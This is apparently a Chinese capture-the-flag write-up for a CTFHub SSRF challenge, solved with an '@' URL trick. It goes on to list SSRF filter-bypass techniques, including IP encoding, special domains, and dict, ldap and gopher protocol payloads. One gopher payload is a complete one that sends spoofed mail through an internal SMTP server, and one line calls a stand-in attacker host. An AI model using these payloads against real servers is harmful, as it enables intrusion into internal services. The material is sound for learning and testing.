这里的要求是请求的URL中必须包含http://notfound.ctfhub.com
这里我第一时间想到的是绕过。
这里先用@来绕过
http://notfound.ctfhub.com@127.0.0.1/flag.php
这里由于必须含有指定的网址,所以不能用数字ip法,这里使用@后访问的是后面的网址
这里说一下绕ssrf的办法
1.攻击本地
http://127.0.0.1:80 http://localhost:22
2.利用[::]
http://[::]:80/ =>http://127.0.0.1
不加端口的话是http://[::]/
3.利用@
这里就是在指定的网址后加@+127.0.0.1
4.利用短域名
http://dwz.cn/11SMa >>> http://127.0.0.1
5.利用特殊域名
原理是DNS解析
http://127.0.0.1.xip.io/
http://www.owasp.org.127.0.0.1.xip.io/
6.利用DNS解析
在域名上设置A记录,指向127.0.0.1
7.利用上传
修改"type=file"为"type=url"
比如:上传图片处修改上传,将图片文件修改为URL,即可能触发SSRF
8.利用句号
127。0。0。1=>127.0.0.1
9.进行进制转换
可以是十六进制,八进制等。
115.239.210.26 >>> 16373751032
首先把这四段数字给分别转成16进制,结果:73 ef d2 1a
然后把 73efd21a 这十六进制一起转换成8进制
记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样),十六进制加0x
10.利用特殊地址
http://0/
11.利用协议
Dict://
dict://@:/d:
ssrf.php?url=dict://attacker:11111/
SFTP://
ssrf.php?url=sftp://example.com:11111/
TFTP://
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
LDAP://
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher://
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a



